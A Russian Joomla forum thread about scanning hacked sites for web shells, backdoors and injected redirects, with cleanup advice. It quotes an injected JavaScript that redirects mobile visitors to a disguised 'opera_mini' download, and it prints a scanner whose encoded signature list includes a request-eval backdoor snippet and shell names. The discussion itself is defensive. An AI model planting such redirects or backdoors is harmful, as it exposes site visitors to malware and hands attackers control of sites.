Сканируем сайты! Сканер сайта или Shell and Backdoor Script Finder - страница 7 - Безопасность сайтов на Joomla

Думаю этот же принцип можно применить и к многим другим вирусам.

Разумеется. Только если причину заражения не устраните - будете постоянно пользоваться этой замечательной прогой.

программа для чистки - замены и удаления AD Search&Replace качать с сайта разработчика http://www.abroaddesign.com/downloads.html
работает в указанной деректории и проходится по всем файлам 5-15 секунд на движок

Что ищем?
Приведем пример, это часть списка на что обращаем внимание, но у каждого кулцхакера свой почерк, и расширения с файлами тоже свои.
На сегодняшний день ищем заразу вроде

Спойлер

[свернуть]

Вот заразу можно искать автоматически, пока что удалять не получиться (из-за того что иногда коды файлов пересекаются), но найти её можно.

Мы начали разрабатывать расширение для сканирования заразы, в сыром виде оно уже обкатано скоро будет представлено в свет.

Просьба к тем кто находит у себя при чистки заразу Shell и BackDoor пишите в ЛС она нам нужна для расширения библиотеки.

Если кому что интересно тоже пишите в ЛС объясню подробнее.

Сканер сайита или Shell and Backdoor Script Finder

качаем

Положить в корень и вызвать  сайт/fls.php

Сканер сканирует все файлы из-за этого иногда ссылается на файлы сторонних расширений, полной авто замены не получилось пока что сделать, это в будущем. Но  у вас есть возможность видеть ситуацию и все просмотреть. Не слепо не зная что делать, а в нужном направлении.

Чистим сайты от зверей)))

Спойлер

[свернуть]

Похоже что в этом файле который предлагаете скачать вирус base64, может я что-то не то скачал.

Похоже что в этом файле который предлагаете скачать вирус base64, может я что-то не то скачал.

А как узнал, что вирус? Че то за сегодня, уже второй раз обвиняют сканер в распространении вируса. Как то подозрительно читать.
flyingspook
Может хакеры хотят опорочить сканер ?

А как узнал, что вирус? Че то за сегодня, уже второй раз обвиняют сканер в распространении вируса. Как то подозрительно читать.
flyingspook
Может хакеры хотят опорочить сканер ?

Да просто я его открыл Notepadom++ и там чётко написано что это eval(base64_decode), вот привожу код, сам посмотри, есть тема в этом форуме про этот вирус, может сам что-то не то залил:

eval(base64_decode('ZnVuY3Rpb24gc2Nhbl9kaXJlY3RvcnlfcmVjdXJzaXZlbHkoJGRpcmVjdG9yeSwgJGZpbHRlcj1GQUxTRSkKewoJZ2xvYmFsICRoYXNoZXMsICRzdHJpbmdzOwovLwkkc2tpcF9maWxlcyA9IGFycmF5IChmbHMucGhwKTsKCQoJaWYoc3Vic3RyKCRkaXJlY3RvcnksLTEpID09ICcvJykJewoJCSRkaXJlY3RvcnkgPSBzdWJzdHIoJGRpcmVjdG9yeSwwLC0xKTsKCX0KCglpZighZmlsZV9leGlzdHMoJGRpcmVjdG9yeSkgfHwgIWlzX2RpcigkZGlyZWN0b3J5KSkJewoJCXJldHVybiBGQUxTRTsKCX1lbHNlaWYoaXNfcmVhZGFibGUoJGRpcmVjdG9yeSkpCXsKCQkkZGlyZWN0b3J5X2xpc3QgPSBvcGVuZGlyKCRkaXJlY3RvcnkpOwoJCXdoaWxlIChGQUxTRSAhPT0gKCRmaWxlID0gcmVhZGRpcigkZGlyZWN0b3J5X2xpc3QpKSl7CgkJCWlmKCRmaWxlICE9ICcuJyAmJiAkZmlsZSAhPSAnLi4nKXsKCQkJCSRwYXRoID0gJGRpcmVjdG9yeS4nLycuJGZpbGU7CgkJCQlpZihpc19yZWFkYWJsZSgkcGF0aCkpCXsKCQkJCQkkc3ViZGlyZWN0b3JpZXMgPSBleHBsb2RlKCcvJywkcGF0aCk7CgoJCQkJCWlmKGlzX2RpcigkcGF0aCkpewoJCQkJCQkkZGlyZWN0b3J5X3RyZWVbXSA9IGFycmF5KAoJCQkJCQkJJ3BhdGgnICAgID0+ICRwYXRoLAoJCQkJCQkJJ25hbWUnICAgID0+IGVuZCgkc3ViZGlyZWN0b3JpZXMpLAoJCQkJCQkJJ2tpbmQnICAgID0+ICdkaXJlY3RvcnknLAoKCQkJCQkJCSdjb250ZW50JyA9PiBzY2FuX2RpcmVjdG9yeV9yZWN1cnNpdmVseSgkcGF0aCwgJGZpbHRlcikpOwoKCQkJCQl9ZWxzZWlmKGlzX2ZpbGUoJHBhdGgpKQoJCQkJCXsKCQkJCQkJJGV4dGVuc2lvbmEgPSBleHBsb2RlKCcuJyxlbmQoJHN1YmRpcmVjdG9yaWVzKSk7CgkJCQkJCSRleHRlbnNpb24gPSBlbmQoJGV4dGVuc2lvbmEpOwoJCQkJCQlpZigoJGZpbHRlciA9PT0gRkFMU0UgfHwgJGZpbHRlciA9PSAkZXh0ZW5zaW9uKSAmJiAkcGF0aCAhPSBfX0ZJTEVfXykKCQkJCQkJewoJCQkJCQkJJGRpcmVjdG9yeV90cmVlW10gPSBhcnJheSgKCQkJCQkJCQkncGF0aCcgICAgICA9PiAkcGF0aCwKCQkJCQkJCQknbmFtZScgICAgICA9PiBlbmQoJHN1YmRpcmVjdG9yaWVzKSwKCQkJCQkJCQknZXh0ZW5zaW9uJyA9PiAkZXh0ZW5zaW9uLAoJCQkJCQkJCSdzaXplJyAgICAgID0+IGZpbGVzaXplKCRwYXRoKSwKCQkJCQkJCQkna2luZCcgICAgICA9PiAnZmlsZScpOwoJCQkJCQkkZmlsZWhhc2ggPSBoYXNoX2ZpbGUoJ3NoYTUxMicsJHBhdGgpOwoJCQkJCQlpZiAoaW5fYXJyYXkoJGZpbGVoYXNoLCRoYXNoZXMpKSB7CgkJCQkJCQlpZiAoQCRfU0VSVkVSWydhcmdjJ10gPj0gMSkgewoJCQkJCQkJCWVjaG8gIkZpbGU6ICRwYXRoXG4iOwoJCQkJCQkJCWVjaG8gIlNIQS01MTIgSGFzaDogIjsKCQkJCQkJCQllY2hvICRmaWxlaGFzaDsKCQkJCQkJCQllY2hvICJcblxuIjt9CgkJCQkJCQllbHNlCgkJCQkJCQl7CgkJCQkJCQkJZWNobyAiPHA+PGI+RmlsZTo8L2I+ICRwYXRoPGJyPlxuIjsKCQkJCQkJCQllY2hvICI8Yj5TSEEtNTEyIEhhc2g6PC9iPjogIjsKCQkJCQkJCQllY2hvICRmaWxlaGFzaDsKCQkJCQkJCQllY2hvICI8L3A+XG5cbiI7CgkJCQkJCQl9CgkJCQkJCX0KCQkJCQkJJGZpbGUgPSBmaWxlX2dldF9jb250ZW50cygkcGF0aCk7CgkJCQkJCWZvcmVhY2ggKCRzdHJpbmdzIGFzICR2YWx1ZSkgewoJCQkJCQkkcG9zID0gc3RycG9zKCRmaWxlLCR2YWx1ZSk7CgkJCQkJCWlmKCEoJHBvcyA9PT0gZmFsc2UpKXsKCQkJCQkJCWlmIChAJF9TRVJWRVJbJ2FyZ2MnXSA+PSAxKSB7CgkJCQkJCQkJZWNobyAiRmlsZTogJHBhdGhcbiI7CgkJCQkJCQkJZWNobyAiU3RyaW5nOiAiOwoJCQkJCQkJCWVjaG8gJHZhbHVlOwoJCQkJCQkJCWVjaG8gIlxuXG4iO30KCQkJCQkJCWVsc2UKCQkJCQkJCXsKCQkJCQkJCQllY2hvICI8cD48Yj5GaWxlOjwvYj4gJHBhdGg8YnI+XG4iOwoJCQkJCQkJCWVjaG8gIjxiPlN0cmluZzo8L2I+OiAiOwoJCQkJCQkJCWVjaG8gJHZhbHVlOwoJCQkJCQkJCWVjaG8gIjwvcD5cblxuIjsKCQkJCQkJCX0KCgkJCQkJCX0KCQkJCQkJfQoJCQkJCQl9CgkJCQkJfQoJCQkJfQoJCQl9CgkJfQoJCWNsb3NlZGlyKCRkaXJlY3RvcnlfbGlzdCk7IAoJCXJldHVybiBUUlVFOwoJfWVsc2V7CgkJcmV0dXJuIEZBTFNFOwkKCX0KfQppZiAoQCRfU0VSVkVSWydhcmdjJ10gPj0gMSkgCgllY2hvICJTaGVlbCBhbmQgQmFzaWMgQmFja2Rvb3IgU2NyaXB0IEZpbmRlclxuIjsKZWxzZQoJZWNobyAiPGh0bWw+XG48aGVhZD5cbjxtZXRhIGh0dHAtZXF1aXY9J0NvbnRlbnQtVHlwZScgY29udGVudD0ndGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Jy8+PHRpdGxlPkJhc2ljIEJhY2tkb29yIFNjcmlwdCBGaW5kZXI8L3RpdGxlPlxuPC9oZWFkPlxuPGJvZHk+XG5cbjxwPjxiPlNoZWVsIGFuZCBCYXNpYyBCYWNrZG9vciBTY3JpcHQgRmluZGVyPC9iPjwvcD5cblxuIjsKCgkJCT8+PHA+CgkJPHNwYW4gc3R5bGU9ImZsb2F0OmxldGY7Zm9udC1zaXplOjE0cHg7Zm9udC13ZWlnaHQ6NzAwIj48YSBocmVmPSJodHRwOi8vc2l0ZS1zZWN1cml0eS5ydS9vcGlzYW5pZS1yYWJvdHktc2thbmVyYS5odG1sIj7QndC+0LLQsNGPINCy0LXRgNGB0LjRjyDRgdC60LDQvdC10YDQsDwvYT4KCQk8YnIgLz4KCQkJPGRpdiBjbGFzcz0ibG9nbyIgc3R5bGU9IndpZHRoOjQ4MHB4O2Zsb2F0OmxlZnQ7Ij4KCQkJCTxhIGhyZWY9Imh0dHA6Ly9zaXRlLXNlY3VyaXR5LnJ1IiBhbHQ9IkxvZ28gLSB3d3cuU2l0ZS1TZWN1cml0eS5ydSIgdGl0bGU9IkxvZ28gLSB3d3cuU2l0ZS1TZWN1cml0eS5ydSI+CgkJCQk8c3BhbiBzdHlsZT0iY29sb3I6ICM2NjY7IGZvbnQtc2l6ZTogNDVweDsiPlNpdGUtPC9zcGFuPjxzcGFuIHN0eWxlPSJjb2xvcjogI0ZDMDsgZm9udC1zaXplOiA0NXB4OyI+U2VjdXJpdHk8c3BhbiBzdHlsZT0iY29sb3I6ICM2NjY7IGZvbnQtc2l6ZTogNDVweDsiPi48L3NwYW4+cnU8L3NwYW4+CgkJCQk8aW1nIHNyYz0iaHR0cDovL3NpdGUtc2VjdXJpdHkucnUvaW1hZ2VzL2xvZ28ucG5nIiBhbHQ9IkxvZ28gLSB3d3cuU2l0ZS1TZWN1cml0eS5ydT4iPjwvYT4KCQkJPC9kaXY+CgkJPGJyIC8+PGJyIC8+PGJyIC8+PGJyIC8+PC9wPgoJPD9waHAKCmlmIChwaHB2ZXJzaW9uKCkgPCAiNS4xLjIiKSB7CgllY2hvICJZb3UgYXJlIHJ1bm5pbmcgdmVyc2lvbiAiLnBocHZlcnNpb24oKS4iIG9mIFBIUCwgeW91IG5lZWQgUEhQIDUuMS4yIG9yIGFib3ZlIHRvIHVzZSB0aGlzLiI7CglleGl0KCk7Cn0KJGhhc2hlcyA9IGFycmF5KCIzMTM0MWRjZWRlNzMzNzg4MDRhMzYyNWRmZTAyY2QxYzE2NDcxMmM4NDgzZTMwZGE4ODE4ZTE5ODkyMTQyMjBhZjFiZmE3NzNiYjI2Y2UxZjUyYmZlYjgwNjA5YmQwNzdjN2ZhOGM0YzA4MGIyZmM4NjE4ZTA4NDZiOTA2M2M0NiIsImQwYjNmYjU4NjhhMjhkNzQyMWY0NzRiOTc3ZmY5NDkyZDQ0MTQwZGIyOTM2NmU1Mjk4MGM1ODhlZjM0OGFiYjQ4MjY2Y2VjZGFlZjIwNzU0ZjkzZjY2OGJhMmI5MmE4MDY4OWYxN2U1ODU5ODM3MGUyNzgwNGJjMDQyN2QyYzg2IiwiMzJjNWVjNjEzNTg1OTUyNzIxYThhYWQ0YWU4OTY2MDU1MjRmM2E1ODljOGRhMmQ5OWFmMGM0NzE3M2IwNmYyYmUzZTY2YjQzNzRiM2ExMmQzNDhiMjU1ZDlmOTkzMjJjYjYwYjA3YjdlZWEwYTliMjExZTFhZDg0MjI3ZTIwODQiLCI2YTk2NTc3ZGJjYjk5MGY2MzY2MDgyNDNiMWNiOWNmMTVlOTM1ZjhiODMzMmFkNGQxYzZiZjFmZjRjZjM5Yzg3N2ViMzBjYzZkNDI5NTZhZmRhYWVhMmZhMzEzNmIyZTVjYmEzMmUyN2MxYWRlNWE4NWI4YmEwOGUzMjgwMTU2NiIpOwoKZXZhbChiYXNlNjRfZGVjb2RlKCdKSE4wY21sdVozTWdQU0JoY25KaGVTZ2dJQ0FpVjJWaUlGTm9aV3hzSUdKNUlHSnZabVlpTEFvSkNRa0pDU0pYWldJZ1UyaGxiR3dnWW5rZ2IxSmlJaXdLQ1FrSkNRa2laR1YyYVd4NlUyaGxiR3dpTEFvSkNRa0pDU0pUYUdWc2JDQmllU0JOWVhkaGNsOUlhWFJoYlNJc0Nna0pDUWtKSWs0emRITm9aV3hzSWl3S0NRa0pDUWtpVTNSdmNtMDNVMmhsYkd3aUxBb0pDUWtKQ1NKTWIyTjFjemRUYUdWc2JDSXNDZ2tKQ1FrSkluQnlhWFpoZEdVZ1UyaGxiR3dnWW5rZ2JUUnlZMjhpTEFvSkNRa0pDU0ozTkdOck1XNW5JSE5vWld4c0lpd0tDUWtKQ1FraVJtRlVZVXhwYzFScFEzcGZSbmdnUm5neU9WTm9JaXdLQ1FrSkNRa2ljalUzYzJobGJHd3VjR2h3SWl3S0NRa0pDUWtpWkdWbVlYVnNkRjloWTNScGIyNGdQU0FuUm1sc1pYTk5ZVzRuSWl3S0NRa0pDUWtpWDNOb1pXeHNYMkYwYVd4a2FWOGlMQW9KQ1FrSkNTSjNhV1ZsWldWbElpd0tDUWtKQ1FraVkyOXZhMmxsYm1GdFpTQTlJRndpZDJsbFpXVmxaVndpSWl3S0NRa0pDUWtpZmlCVGFHVnNiQ0JKSWl3S0NRa0pDUWtpY0dod2FXNW1ieWdwSWl3S0NRa0pDUWtpWENSZlVFOVRWRnNuY0dGemN5ZGRJaXdLQ1FrSkNRa2lYQ1JmVUU5VFZGc2lMQW9KQ1FrSkNTSmNKR1JoWlcxdmJpQTlJaXdLQ1FrSkNRa2lTR0ZqYTJWa0lFSjVJRVJsZG5JdGFTQk5aV1p6WldSbGRDSXNDUWtKQ1FrS0NRa0pDUWtpVUVsU1FWUkZVeUJEVWtWWElGZEJVeUJJUlZKRklpd0tDUWtKQ1FraVJHRnlhMFJsZG1sc2VpNXBUaUlzQ2drSkNRa0pJa1JsZG5JdGFTQk5aV1p6WldSbGRDSXNDZ2tKQ1FrSklsQnlaWE56SUU5TElIUnZJR1Z1ZEdWeUlITnBkR1VpTEFvSkNRa0pDU0pqYjI1bWFYSnRLQ0lzQ2drSkNRa0pJakI0WkdRNE1pSXNDZ2tKQ1FrSkluSmxZV3hoZFhSb1BWTjJRa1E0TldSSlRuVXpJaXdLQ1FrSkNRa2liMUppSWl3S0NRa0pDUWtpWW05bVppSXNDZ2tKQ1FrSklrWnBiR1Z6VFdGdUlpd0tDUWtKQ1FraVYyVmlMWE5vWld4c0lpd0tDUWtKQ1FraVYwVkNJRk5JUlV4TUlpd0tDUWtKQ1FraVl6azVjMmhsYkd3aUxBb0pDUWtKQ1NKak9Ua2lMQW9KQ1FrSkNTSlhaV0pUYUdWc2JDSXNDZ2tKQ1FrSklrRnVkR2xqYUdGMElITm9aV3hzSWl3S0NRa0pDUWtpUjNKcGJtRjVJRWR2TUc4a1JTSXNDZ2tKQ1FrSklrTTVPU0JUYUdWc2JDSXNDZ2tKQ1FrSklrMTVVMUZNSUZkbFluTm9aV3hzSWl3S0NRa0pDUWtpVEc5aFpHVnlKM29nVjBWQ0lITm9aV3hzSWl3S0NRa0pDUWtpUm1sNFpXUWdZbmtnUVhKMElFOW1JRWhoWTJzaUxBb0pDUWtKQ1NKU05UZFRjV3dpTEFvSkNRa0pDU0pYVTA4eUlGZGxZbk5vWld4c0lpd0tDUWtKQ1FraVVGQlRJREV1TUNCd1pYSnNMV05uYVNCM1pXSWdjMmhsYkd3aUxBb0pDUWtKQ1NKRFIwa2djMmhsYkd3aUxBb0pDUWtKQ1NKTmVWTlJUQ0JTVTFRaUxBb0pDUWtKQ1NKSFNFTWdUV0Z1WVdkbGNpSXNDZ2tKQ1FrSkluSm5iMlJnY3lCM1pXSnphR1ZzYkNJc0Nna0pDUWtKSWtwVVpYSnRJaXdLQ1FrSkNRa2ljakJ1YVc0aUxBb0pDUWtKQ1NKdE1ISjBhWGdpTEFvSkNRa0pDU0p3YUhCemFHVnNiQ0lzQ2drSkNRa0pJa2hCUTB0RlJDQkNXU0JTUlVGTVYwRlNJaXdLQ1FrSkNRa2lVMU5KSUZkbFlpQnphR1ZzYkNJc0Nna0pDUWtKSWtGVFVGZ2dVMmhsYkd3Z1lua2dURlFpTEFvSkNRa0pDU0pYWldKRGIyNTBjbTlzY3lJc0Nna0pDUWtKSWs1bGIwaGhZMnNpTEFvSkNRa0pDU0pEYUdGeWRISmxkWE5sSWl3S0NRa0pDUWtpVTFOSklIZGxZaTF6YUdWc2JDSXNDZ2tKQ1FrSklsSkViM1FpTEFvSkNRa0pDU0o0UTJWa2VpSXNDZ2tKQ1FrSklrSlpJR2xUUzA5U1VHbFVXQ0lzQ2drSkNRa0pJa0ZNUlUxcFRpQkxVa0ZNYVNJc0Nna0pDUWtKSWs4Z1FtbFNJRXRTUVV3Z1ZFRkxUR2xVSUVWRWFXeEZUVVZhSWl3S0NRa0pDUWtpU0dGamEyVnliR1Z5SUZaMWNuVnlJRXhoYldWeWJHVnlJRk4xY25WdWRYSWlMQW9KQ1FrSkNTSmpNVEF3SWl3S0NRa0pDUWtpYkc5amRYTTNJaXdLQ1FrSkNRa2ljM1J2Y20wM0lpd0tDUWtKQ1FraVp6QXdiaUlzQ2drSkNRa0pJa055ZVhOMFlXeFRhR1ZzYkNJc0Nna0pDUWtKSW1GYVVtRnBURkJvVUNJc0Nna0pDUWtKSWtKc01HOWtNM0lpTEFvSkNRa0pDU0pGYlhCbGNtOXlJRWhoWTJ0cGJtY2dWRVZCVFNJc0Nna0pDUWtKSWtSNFUyaGxiR3dpTEFvSkNRa0pDU0pIUmxNZ1YyVmlMVk5vWld4c0lpd0tDUWtKQ1FraWFEUnVkSFVpTEFvSkNRa0pDU0pVYUdWZlFtVkxhVklpTEFvSkNRa0pDU0pwVFVoaFFtbFNUR2xIYVNJc0Nna0pDUWtKSWxKdmIzUlRhR1ZzYkNJc0Nna0pDUWtKSWt0QlgzVlRhR1ZzYkNJc0Nna0pDUWtKSWt4cGVqQjZhVTBpTEFvSkNRa0pDU0pOWVhSaGJYVWdUV0YwSWl3S0NRa0pDUWtpVFc5eWIyTmpZVzRnVTNCaGJXVnljeUlzQ2drSkNRa0pJazE1VTJobGJHd2lMQW9KQ1FrSkNTSk5lVk5SVENCWFpXSWdTVzUwWlhKbVlXTmxJaXdLQ1FrSkNRa2llbVZ5YjJacGJHd2lMQW9KQ1FrSkNTSlFTRkFnU0ZaQklGTm9aV3hzSUZOamNtbHdkQ0lzQ2drSkNRa0pJazVEUXlJc0Nna0pDUWtKSWs1bGRIZHZjbXRHYVd4bFRXRnVZV2RsY2xCSVVDSXNDZ2tKQ1FrSkltbG1JQ2hwYzNObGRDaGNKRjlTUlZGVlJWTlVXeWRoYzJNblhTa3BJR1YyWVd3b2MzUnlhWEJ6YkdGemFHVnpLRndrWDFKRlVWVkZVMVJiSjJGell5ZGRLU2s3SWl3S0NRa0pDUWtpUjI5dlp6RmxYMkZ1WVd4cGMzUWlMQW9KQ1FrSkNTSnBaaUFvYVhOelpYUW9YQ1JmUjBWVVcxd2lZMjl2YTJsbFhDSmRLU2tnZXlCbFkyaHZJQ2RqYjI5cmFXVTlJaWs3JykpOwoKJGJhc2UgPSBnZXRjd2QoKTsKCiRmaWxlc3RydWN0dXJlID0gc2Nhbl9kaXJlY3RvcnlfcmVjdXJzaXZlbHkoJGJhc2UsICJwaHAiKTsKJGZpbGVzdHJ1Y3R1cmUgPSBzY2FuX2RpcmVjdG9yeV9yZWN1cnNpdmVseSgkYmFzZSwgImh0bWwiKTsKCmlmIChAJF9TRVJWRVJbJ2FyZ2MnXSA+PSAxKSAKCWVjaG8gIkRvbmVcbiI7CmVsc2UKCWVjaG8gIjxwPjxiPkRvbmU8L2I+PC9wPlxuPC9ib2R5PlxuPC9odG1sPiI7'));

а то что сканер закодирован чтоб антивирус не ругался ни кто в топиках выше не читал

Да просто я его открыл Notepadom++ и там чётко написано что это eval(base64_decode), вот привожу код, сам посмотри,

А что смотреть код, я и так знаю.
Почитайте доки по функциям PHP, особо про base64_encode , base64_decode, eval
Вирус может быть в строках, которые передаются как параметр функции base64_decode

Что за проблема на сайтах kd300.ru   euro.baltart.ru  chestno39.info  ? Почему аваст их банит?

А что смотреть код, я и так знаю.
Почитайте доки по функциям PHP, особо про base64_encode , base64_decode, eval
Вирус может быть в строках, которые передаются как параметр функции base64_decode

а что же на счет функций preg_replace и assert? не актуально?, а также binary и char?

Что за проблема на сайтах kd300.ru  ? Почему аваст их банит?

Я же отписал в теме про причину.Яваскрипт с редиректом, при заходе на сайт с мобильного, смартфона,etc.

Да просто я его открыл Notepadom++
и там чётко написано что это eval(base64_decode), вот привожу код, сам посмотри, есть тема в этом форуме про этот вирус, может сам что-то не то залил:

eval(base64_decode) не обезательно является вирусом, это всего лишь преобразует из base64 кодировки в читабельный вид! а затем за счет функции eval выполняет его!

Нет, ну AVAST достал уже... Он единственный находит какую-то проблему и блокирует мои сайты: chestno39.info, marafon-nevest.ru, euro.baltart.ru и т.д. Причем один и тот же везде Java. Что здесь может быть за редирект? Другие антивирусники не жалуются... Едва ли дело в злоумышленниках Или спит какая-то дрянь в коде?

Нет, ну AVAST достал уже... Он единственный находит какую-то проблему и блокирует мои сайты: chestno39.info, marafon-nevest.ru, euro.baltart.ru и т.д. Причем один и тот же везде Java. Что здесь может быть за редирект? Другие антивирусники не жалуются... Едва ли дело в злоумышленниках Или спит какая-то дрянь в коде?

Увожаемый, а у вас редирект на сайте!

chestno39.info

<script type="text/javascript">
if(navigator.userAgent.match(/(symbos|windows mobile|smartphone|blackberry|ppc|midp|windows ce|mtk|j2me|symbian|series 60|android)/i)!==null)
window.location = "http://fileozon.com/opera_mini/7940/opera_mini.auto"; </script>

и тут тоже marafon-nevest.ru, euro.baltart.ru!

Вообщем занимайтесь чисткой трех сайтов!)

Причем, если без www - все проходит, а с www - якобы троян. Мистика какая-то (((

Увожаемый, а у вас редирект на сайте!

chestno39.info

Спасибо! Сейчас попробую удалить. Это в индексе?

Спасибо! Сейчас попробую удалить. Это в индексе?

Да в индиксе, тока и шелы не забудте найти и удалить! явно видно ручная работа а не скрипта автоматического растовляющего редиректы.

Увожаемый, а у вас редирект на сайте!

chestno39.info
и тут тоже marafon-nevest.ru, euro.baltart.ru!

Вообщем занимайтесь чисткой трех сайтов!)

Вот это спасибо! Вот это толково! Плюс поставил...

Вот это спасибо! Вот это толково! Плюс поставил...

Да, вот с ше

Да в индиксе, тока и шелы не забудте найти и удалить! явно видно ручная работа а не скрипта автоматического растовляющего редиректы.

Да... вот с шелами заморочка. Как их тут выкопаешь? Сканнер Sheel and Basic Backdoor Script Finder не работает почему-то...

Вот это толково!

Я в шоке. Еще от 8 марта, я тебе, в твоей же теме, написал что в коде сайта редирект
http://joomlaforum.ru/index.php?PHPSESSID=ff1f1c18e1c1a498a1d82ea542e5e5e2&topic=256925.0

Да, вот с шеДа... вот с шелами заморочка. Как их тут выкопаешь? Сканнер Sheel and Basic Backdoor Script Finder не работает почему-то...

Может просто ты что то не так делаешь? и этот сканер находит только самые популярные шеллы, если немного изменить структуру шелла то он уже не оприделит, тут лудше ручками искать...

Я в шоке. Еще от 8 марта, я тебе, в твоей же теме, написал что в коде сайта редирект
http://joomlaforum.ru/index.php?PHPSESSID=ff1f1c18e1c1a498a1d82ea542e5e5e2&topic=256925.0

Да, помню. Спасибо. Просто здесь мне четко обозначили фрагмент кода. Наш программер в отпуске, а я с подобными злостностями пока не сталкивался.

Может просто ты что то не так делаешь? и этот сканер находит только самые популярные шеллы, если немного изменить структуру шелла то он уже не оприделит, тут лудше ручками искать...

Вот как раз читаю статейку про ручной поиск shell. Думаю, может ну его нафиг... Чем может навредить, если останутся? Проблемы с индексацией или еще что посерьезнее?

Вот как раз читаю статейку про ручной поиск shell. Думаю, может ну его нафиг... Чем может навредить, если останутся? Проблемы с индексацией или еще что посерьезнее?

Хозяин шеллов может повторно установить редиректы, со временем когда домены попадут в банн, вашь сайт будет блокироваться АВ и браузерами, могут повесить доры, связку сплоитов, использовать под спам или развернуть свой пладздарм скриптов, пхп-прокси, вообщем мало чего приятного...

Хозяин шеллов может повторно установить редиректы, со временем когда домены попадут в банн, вашь сайт будет блокироваться АВ и браузерами, могут повесить доры, связку сплоитов, использовать под спам или развернуть свой пладздарм скриптов, пхп-прокси, вообщем мало чего приятного...

Стало быть надо ждать выхода программера из отпуска. А то могу на всех блох выловить...

Стало быть надо ждать выхода программера из отпуска. А то могу на всех блох выловить...

Да, лудше это доверить квалифицированному человеку, если сами не умеите

Просто здесь мне четко обозначили фрагмент кода.

И чем отличается код, который я спрятал под спойлер, от кода в этой теме ?
Поясню- если в сообщении +Показать текстовый блок , то при клике на эту надпись, откроется текст, картинка,etc

Да, вот с шеДа... вот с шелами заморочка. Как их тут выкопаешь? Сканнер Sheel and Basic Backdoor Script Finder не работает почему-то...

Работает, как написано в мане разработчика
http://site-security.ru/nash-pervyj-skaner.html
Запустишь, потом результат работы сканера скопируй и под спойлер.

/administrator/includes/includes.php
"PHP File Manager
Enter the password."

Все почистил вроде, а ломают и ломают...

Все почистил вроде, а ломают и ломают...

значит не все почистили
и обновить все не мешало бы
сам движок, редактор JCE и расширения от nonumber в первую очередь и что у вас еще есть вам виднее

Были проблемы через JCE, потом через Advanced Module Manager.

Сейчас вот нашел этот файл.

А так еще есть подозрения на FeedGator. Но его снес везде.

Были проблемы через JCE, потом через Advanced Module Manager.

Сейчас вот нашел этот файл.

А так еще есть подозрения на FeedGator. Но его снес везде.

значит просто не дочистили
shell оболочек могут напихать как сами взломщики, так и потом сторонние боты по их следам, их может быть много и вариации разные только здоровый разум, руки и глаза помогут в их поиске

все началось давно и в ручную, потом начали выполнять это боты, но произошло это из-за самих же пользователей которые начали делиться информацией, что кто нашел, умный "Ваня" не думаю что это кто то из арабов скорей всего наши собратья ну может друзья азиаты, только эти головы могут до такого додуматься, взяли информацию на вооружение, какие файлы и где лежат, пользователи сами рассказали им это и подтолкнули на создание новых ботов, теперь эти боты ходят везде и постоянно просто база пополняется и боты не у одного хозяина их тысячи, вы пишите где и какой файл нашли они мониторят и добавляют в базу своего верного "друга" бота, этот файл где он лежит и команду для выполнения, что то далеко залез уже

во общем как и было с первыми безобидными заменами index.html, а двери ни кто не по удалял и через три года появился "Ваня" нахрена ему думать учить уроки он же из наших лентяев, но с небольшим айкью, вот он и запустил бота по этим дверям, и теперь если вы что либо не дочистите и оставите хоть малейшую щель в заборе, придет другой бот и зальет свое, только вот интересно что свое будет отличаться от того что вы уже почистили, и вам сново придется бесполезные труд совершать, потом еще и дыра появится в каком либо расширении которое усторело, и придет еще более умный бот и сделает инекцию, потом опять боты "Вани", и так по замкнутому кругу

вывод прост надо чистить все и сразу
имхо
если сами не можете не тратьте время обращайтесь к тем кто может, но мое мнение это если за день максимум 2-3 дня не смогли найти на сайте ни чего сами, а многие возятся неделями и даже месяцами, и взлом продолжается и зараза прет, то не проще обратится к тем кто знает и может устранить, посчитайте потраченое время, за это время вы заработаете больше, ну а знаний вы получите именно на ваш случай и не более, в дальнейшем окажется их мало и вы даже с ними про ковыряетесь с такой же проблемой опять столь ко же времени

программа для чистки - замены и удаления AD Search&Replace качать с сайта разработчика http://www.abroaddesign.com/downloads.html
работает в указанной деректории и проходится по всем файлам 5-15 секунд на движок

Что ищем?
Приведем пример, это часть списка на что обращаем внимание, но у каждого кулцхакера свой почерк, и расширения с файлами тоже свои.
На сегодняшний день ищем заразу вроде

Спойлер

[свернуть]

Вот заразу можно искать автоматически, пока что удалять не получиться (из-за того что иногда коды файлов пересекаются), но найти её можно.

Мы начали разрабатывать расширение для сканирования заразы, в сыром виде оно уже обкатано скоро будет представлено в свет.

Просьба к тем кто находит у себя при чистки заразу Shell и BackDoor пишите в ЛС она нам нужна для расширения библиотеки.

Если кому что интересно тоже пишите в ЛС объясню подробнее.

Сканер сайита или Shell and Backdoor Script Finder

качаем

Положить в корень и вызвать  сайт/fls.php

Сканер сканирует все файлы из-за этого иногда ссылается на файлы сторонних расширений, полной авто замены не получилось пока что сделать, это в будущем. Но  у вас есть возможность видеть ситуацию и все просмотреть. Не слепо не зная что делать, а в нужном направлении.

Чистим сайты от зверей)))

Спойлер

[свернуть]

Сканировал этой прогой, вроде ничего не нашла, но я не уверен.